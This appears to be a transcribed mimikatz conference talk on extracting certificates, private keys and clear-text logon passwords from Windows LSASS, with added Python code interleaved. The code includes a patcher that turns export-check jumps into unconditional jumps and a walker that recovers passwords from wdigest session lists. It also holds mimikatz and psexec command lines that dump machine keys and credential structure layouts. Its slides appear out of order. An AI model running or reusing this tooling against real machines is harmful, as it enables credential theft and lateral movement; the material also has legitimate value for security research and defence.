        mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patch :: cng :: because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...

    .text:6C815210 75 1C    jnz  short continue_key_export
    .text:6C815210 EB 1C    jmp  short continue_key_export
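The opcode arithmetic behind both patches (the two near jnz sites in rsaenh for capi, the short jnz in LSASS for cng), as an added example that is not mimikatz code: given the bytes at a patch site it returns the same-length replacement that turns the conditional jnz into an unconditional jmp, and jump_target() lets you confirm the displacement still reaches the original target before writing anything. Where the bytes come from and how they are written back into a loaded module is outside this snippet; it only does the byte-level reasoning. The rule it relies on: a relative jump is taken from the end of its instruction, and nop + jmp rel32 ends exactly where jnz rel32 ended, so the same rel32 lands on the same target.

```python
# near jnz rel32 : 0F 85 <rel32>  ->  90 E9 <rel32>  (nop + jmp rel32, still 6 bytes)
# short jnz rel8 : 75 <rel8>      ->  EB <rel8>      (jmp rel8, still 2 bytes)
NEAR_JNZ = b"\x0f\x85"
NEAR_JMP_WITH_NOP = b"\x90\xe9"
NEAR_JMP = 0xE9
SHORT_JNZ = 0x75
SHORT_JMP = 0xEB


def patch_jnz_to_jmp(site):
    """Return the patched copy of `site` (bytes starting at the jnz); same length,
    displacement bytes and anything after them untouched."""
    if site[:2] == NEAR_JNZ and len(site) >= 6:
        return NEAR_JMP_WITH_NOP + site[2:]
    if len(site) >= 2 and site[0] == SHORT_JNZ:
        return bytes([SHORT_JMP]) + site[1:]
    raise ValueError("no jnz at the start of the buffer")


def jump_target(address, site):
    """Absolute target of the jump at `address`, for the original jnz or the
    patched form. 32-bit code as on the slides: addresses wrap at 32 bits."""
    if site[:2] in (NEAR_JNZ, NEAR_JMP_WITH_NOP):
        size, disp_bytes = 6, site[2:6]            # nop+jmp ends where jnz ended
    elif site[:1] == bytes([NEAR_JMP]):
        size, disp_bytes = 5, site[1:5]
    elif site[:1] in (bytes([SHORT_JNZ]), bytes([SHORT_JMP])):
        size, disp_bytes = 2, site[1:2]
    else:
        raise ValueError("not a jnz/jmp")
    if len(site) < size:
        raise ValueError("truncated instruction")
    disp = int.from_bytes(disp_bytes, "little", signed=True)
    return (address + size + disp) & 0xFFFFFFFF


def patch_site(image, offset, address):
    """Patch a module image (bytearray) in place at `offset`, the file/RVA
    position of the jnz whose virtual address is `address`. Refuses to write if
    the target would move. Returns the (unchanged) absolute target."""
    before = bytes(image[offset:offset + 6])
    after = patch_jnz_to_jmp(before)
    if jump_target(address, before) != jump_target(address, after):
        raise RuntimeError("patch would change the jump target")
    image[offset:offset + len(after)] = after
    return jump_target(address, after)


if __name__ == "__main__":
    # Bytes copied from the slides: two rsaenh (capi) sites and the cng site.
    sites = ((0x0AC0B7CB, "0F8533C7FFFF"), (0x0AC1F749, "0F85B63BFFFF"), (0x6C815210, "751C"))
    for address, raw in sites:
        site = bytes.fromhex(raw)
        print(f"{address:08X}: {site.hex()} -> {patch_jnz_to_jmp(site).hex()} "
              f"target {jump_target(address, site):08X}")
```

With the slide's bytes, 0F 85 33 C7 FF FF at 0AC0B7CB and 90 E9 33 C7 FF FF at the same address both resolve to 0AC07F04, which is why only the two opcode bytes need to change; a short jnz needs a single byte because jmp rel8 has the same length as jnz rel8.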
mimikatz :: crypto :: patch :: cng :: demo time
Import, export, import as not exportable..., export again!
mimikatz :: crypto :: patch :: cng :: limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz :: crypto :: patch :: cng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil

Before the patch:

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.

After the patch:

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Encryption test passed
    CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo
Some commands:
    mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
    mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what can we do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computers
- no admin, no admin, no admin...
Basics:
- Use smartcards/tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
- See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilter actions
  • List Notifications (process, thread, image, registry)
  • List Object hooks and procedures
  • ...
- ...
mimikatz :: that's all folks!
Thanks to:
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg :: questions?
The KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems...
- In all cases, the system seems to be vulnerable to pass-the-...
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).

        TSPasswordCreds ::= SEQUENCE {
            domainName [0] OCTET STRING,
            userName   [1] OCTET STRING,
            password   [2] OCTET STRING
        }

- Challenge/response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server...
So the password resides somewhere in memory!
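What tspkg has to hand over once "Default credentials" delegation is on, as an added example (not from the slides, not mimikatz or Windows code): a minimal DER encoder and decoder for the [MS-CSSP] TSPasswordCreds structure quoted above. It assumes the strings are UTF-16LE as CredSSP encodes them and that the [n] tags are EXPLICIT, i.e. context-specific constructed tags 0xA0..0xA2 wrapping an OCTET STRING (0x04); the credentials used at the bottom are made up. The point to see is that the password is an ordinary OCTET STRING: only the TLS/CredSSP channel protects it in transit, and the client cannot build this blob from a hash or a ticket.

```python
def der_length(n):
    """DER length octets: short form below 128, long form (0x80|N, then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag, content):
    return bytes([tag]) + der_length(len(content)) + content


def encode_ts_password_creds(domain, user, password):
    """Build the TSPasswordCreds blob that the client delegates to the server."""
    fields = []
    for index, value in enumerate((domain, user, password)):
        octets = der_tlv(0x04, value.encode("utf-16-le"))   # OCTET STRING, UTF-16LE
        fields.append(der_tlv(0xA0 | index, octets))         # [index] EXPLICIT
    return der_tlv(0x30, b"".join(fields))                   # SEQUENCE


def _read_tlv(buf, pos):
    """Return (tag, content, position after the element). Rejects truncated data
    and non-minimal or oversized lengths so a hostile blob cannot read past the end."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        if count == 0 or count > 4 or pos + count > len(buf):
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[pos:pos + count], "big")
        if length < 0x80 or (count > 1 and buf[pos] == 0):
            raise ValueError("non-minimal DER length")
        pos += count
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated DER content")
    return tag, buf[pos:end], end


def decode_ts_password_creds(blob):
    """Parse a TSPasswordCreds blob into {'domainName', 'userName', 'password'}."""
    names = {0: "domainName", 1: "userName", 2: "password"}
    tag, body, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("expected a single SEQUENCE")
    creds, pos = {}, 0
    while pos < len(body):
        tag, inner, pos = _read_tlv(body, pos)
        index = tag & 0x1F
        if tag & 0xE0 != 0xA0 or index not in names or names[index] in creds:
            raise ValueError(f"unexpected or repeated tag {tag:#x}")
        inner_tag, octets, inner_end = _read_tlv(inner, 0)
        if inner_tag != 0x04 or inner_end != len(inner):
            raise ValueError("field is not a single OCTET STRING")
        creds[names[index]] = octets.decode("utf-16-le")
    if len(creds) != len(names):
        raise ValueError("missing field(s)")
    return creds


if __name__ == "__main__":
    # Constructed sample credentials, not captured traffic.
    blob = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```

Feeding the decoder a blob captured from a decrypted CredSSP exchange gives back the three strings directly; there is no challenge-response step on the client side to hide the password.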
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols
- sounds cool... (thanks Microsoft)
Let's imagine a scenario:
- Enumerate all sessions to obtain:
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain:
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
  • TS_PRIMARY_CREDENTIAL with clear text credentials...

    kd> x tspkg!*clear*
    75016d1c          tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68          tspkg!TSDuplicatePassword = <no type information>
    75011cd4          tspkg!TSHidePassword = <no type information>
    750195ee          tspkg!TSRevealPassword = <no type information>
    75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID -> lookup in tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text passwords over http/https are not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios:
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[...]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI:[...])
Even after logon, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon
The WDigest provider must have the elements to compute responses for different servers:
- Username
- Realm (from server)
- Password
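The RFC 2617 computation written out, as an added example (not from the slides): it shows the client side that WDigest must perform, and the server side that only needs the per-realm HA1, which is the "hash for each realm" that Advanced Digest stores in Active Directory. The test vector is the one from RFC 2617 section 3.5 (user "Mufasa", realm "testrealm@host.com", password "Circle Of Life", nonce "dcd98b7102dd2f0e8b11d0f600bfb0c093"); any other realm name used with it is made up. Only qop=auth is handled; auth-int also hashes the entity body into HA2.

```python
import hashlib
import hmac


def md5hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """HA1 = MD5(username:realm:password). The realm is chosen by the server,
    so a client cannot compute this at logon for servers it has not met yet."""
    return md5hex(f"{username}:{realm}:{password}")


def ha2(method, digest_uri):
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return md5hex(f"{method}:{digest_uri}")


def response_from_ha1(h1, nonce, method, digest_uri, qop=None, nc=None, cnonce=None):
    """response = MD5(HA1:nonce:[nc:cnonce:qop:]HA2). This is all a verifier
    needs: HA1 for its own realm, never the password itself."""
    h2 = ha2(method, digest_uri)
    if qop is None:                                   # RFC 2069 compatibility form
        return md5hex(f"{h1}:{nonce}:{h2}")
    if qop != "auth":
        raise ValueError("only qop=auth is handled here")
    if nc is None or cnonce is None:
        raise ValueError("qop=auth needs nc and cnonce")
    return md5hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def digest_response(username, realm, password, nonce, method, digest_uri,
                    qop=None, nc=None, cnonce=None):
    """Client side: the SSP needs username, realm and password every time."""
    return response_from_ha1(ha1(username, realm, password), nonce, method,
                             digest_uri, qop, nc, cnonce)


def verify_response(stored_ha1, nonce, method, digest_uri, response,
                    qop=None, nc=None, cnonce=None):
    """Server side, using the stored per-realm HA1; constant-time compare."""
    expected = response_from_ha1(stored_ha1, nonce, method, digest_uri, qop, nc, cnonce)
    return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
    for realm in ("testrealm@host.com", "other.example"):   # second realm is made up
        print(realm, ha1("Mufasa", realm, "Circle Of Life"))
    print(digest_response("Mufasa", "testrealm@host.com", "Circle Of Life", nonce,
                          "GET", "/dir/index.html", qop="auth", nc="00000001", cnonce="0a4f113b"))
```

Running the main block prints two different HA1 values for the two realms: a client that may be challenged by several servers has no single hash it could keep instead of the password, which is the reason wdigest keeps the password in LSASS memory.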
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
- that WDigest keeps the password in memory « by protocol », for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so, protect with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- Hypothesis seems verified!
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

    .text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]
    .text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        [...]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        [...]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
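The "search linked list for LUID" step of the workflow above, as an added example (not from the slides and not mimikatz code): it walks a wdigest-style l_LogSessList in a memory snapshot and resolves the three LSA_UNICODE_STRINGs of the matching entry, for both the x86 and x64 layouts. It works on a constructed byte buffer standing in for the LSASS address space (in practice the bytes would come from ReadProcessMemory or a minidump), so nothing here touches a real process. Two things are assumptions of this sample only: the fields the slide elides ("[...]") between the LUID and UserName are `elided` bytes long (a made-up value; the real offset varies per Windows build), and the Password buffer holds plain UTF-16 rather than the LsaProtectMemory output a live LSASS would contain, which would still have to go through LsaUnprotectMemory or the imported keys.

```python
import struct

PTR_FMT = {4: "<I", 8: "<Q"}          # x86 / x64 pointer packing


class MemoryImage:
    """Flat snapshot of part of a process address space (here a constructed
    buffer; in practice filled from ReadProcessMemory on lsass or a minidump)."""

    def __init__(self, base, data, ptr_size):
        if ptr_size not in PTR_FMT:
            raise ValueError("ptr_size must be 4 (x86) or 8 (x64)")
        self.base, self.data, self.ptr_size = base, bytes(data), ptr_size

    def read(self, addr, size):
        off = addr - self.base
        if off < 0 or off + size > len(self.data):
            raise ValueError(f"read outside image: {addr:#x} (+{size})")
        return self.data[off:off + size]

    def ptr(self, addr):
        return struct.unpack(PTR_FMT[self.ptr_size], self.read(addr, self.ptr_size))[0]

    def luid(self, addr):
        low, high = struct.unpack("<II", self.read(addr, 8))   # LUID {LowPart, HighPart}
        return (high << 32) | low

    def lsa_unicode_string(self, addr):
        """LSA_UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer}:
        Buffer follows the two USHORTs (+4 padding bytes on x64), i.e. it sits at
        offset ptr_size on both architectures. Returns the raw buffer bytes."""
        length = struct.unpack("<H", self.read(addr, 2))[0]
        return self.read(self.ptr(addr + self.ptr_size), length) if length else b""


def entry_offsets(ptr_size, elided):
    """Offsets inside a KIWI_WDIGEST_LIST_ENTRY: Flink, Blink, UsageCount (padded
    to a pointer on x64), This, LUID, `elided` unknown bytes (sample assumption),
    then the three LSA_UNICODE_STRINGs UserName / Domaine / Password."""
    p, us = ptr_size, 2 * ptr_size                 # us = sizeof(LSA_UNICODE_STRING)
    user = 4 * p + 8 + elided
    return {"luid": 4 * p, "user": user, "domain": user + us,
            "password": user + 2 * us, "size": user + 3 * us}


def find_wdigest_creds(img, list_head, luid, elided, max_entries=4096):
    """Walk the circular LIST_ENTRY at wdigest!l_LogSessList; return
    (user, domain, password_bytes) for the matching LUID, or None. The visited
    set and the cap keep a corrupted or racing list from looping forever."""
    off = entry_offsets(img.ptr_size, elided)
    seen, cur = set(), img.ptr(list_head)          # Flink is the first field
    while cur != list_head and cur not in seen and len(seen) < max_entries:
        seen.add(cur)
        if img.luid(cur + off["luid"]) == luid:
            user = img.lsa_unicode_string(cur + off["user"]).decode("utf-16-le")
            domain = img.lsa_unicode_string(cur + off["domain"]).decode("utf-16-le")
            # In a live LSASS this buffer is LsaProtectMemory output, still to be unprotected.
            return user, domain, img.lsa_unicode_string(cur + off["password"])
        cur = img.ptr(cur)
    return None


def build_sample_image(ptr_size, elided=8, base=0x7F000000):
    """Constructed snapshot: list head, two entries, then the string buffers.
    The sessions are made up (0x3E7 is the well-known SYSTEM LUID)."""
    p, fmt = ptr_size, PTR_FMT[ptr_size]
    pk = lambda value: struct.pack(fmt, value)
    off = entry_offsets(p, elided)
    head = base
    entries = [head + 2 * p, head + 2 * p + off["size"]]
    strings_at = entries[-1] + off["size"]
    sessions = [(0x3E7, "SYSTEM", "NT AUTHORITY", ""),
                (234870, "Gentil Kiwi", "vm-w8-rp-x", "waza1234")]
    blob, refs = bytearray(), []                   # refs[i] = [(buffer addr, byte length)]
    for _, *strings in sessions:
        refs.append([])
        for text in strings:
            encoded = text.encode("utf-16-le")
            refs[-1].append((strings_at + len(blob), len(encoded)))
            blob += encoded
    image = bytearray(pk(entries[0]) + pk(entries[-1]))          # head: Flink, Blink
    for i, (luid, *_) in enumerate(sessions):
        e = bytearray(off["size"])
        e[0:p] = pk(entries[i + 1] if i + 1 < len(entries) else head)   # Flink
        e[p:2 * p] = pk(entries[i - 1] if i else head)                    # Blink
        struct.pack_into("<I", e, 2 * p, 1)                               # UsageCount
        e[3 * p:4 * p] = pk(entries[i])                                   # This
        struct.pack_into("<II", e, off["luid"], luid & 0xFFFFFFFF, luid >> 32)
        for field, (addr, length) in zip(("user", "domain", "password"), refs[i]):
            struct.pack_into("<HH", e, off[field], length, length)        # Length, MaximumLength
            e[off[field] + p:off[field] + 2 * p] = pk(addr)               # Buffer
        image += e
    return MemoryImage(base, image + blob, p), head


if __name__ == "__main__":
    for ptr_size in (4, 8):
        img, head = build_sample_image(ptr_size)
        user, domain, password = find_wdigest_creds(img, head, 234870, elided=8)
        print(f"{8 * ptr_size}-bit: {domain}\\{user} {password.decode('utf-16-le')}")
```

Against a real dump the same walker works once two inputs are known from symbols: the address of wdigest!l_LogSessList and the build-specific distance between the LUID and UserName; the LIST_ENTRY/LSA_UNICODE_STRING handling does not change.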
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~... let's be more brutal this time: make a WinDBG trap!

    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe
    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Call stacks caught by the trap (kc 5 on each LsaProtectMemory hit):

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2              <- Our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials           <- Yeah! Pass the Hash capability with Live accounts too...

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials            <- Live users can logon through RDP via SSO

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
      [...]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

Call stacks caught by the same trap:

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials         <- Kerberos, ticket part? Maybe ;)

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials         <- Kerberos, part for the password

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID -> lookup in kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        [...]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
Ok, it works...
But why?
Not at all logons on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical...
- For password auth:
  • password hash for the shared secret, but keeping the password in memory
- For full smartcard auth:
  • No password on client
  • No hash on client
- NTLM hash on client...
- KDC sent it back as a gift
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
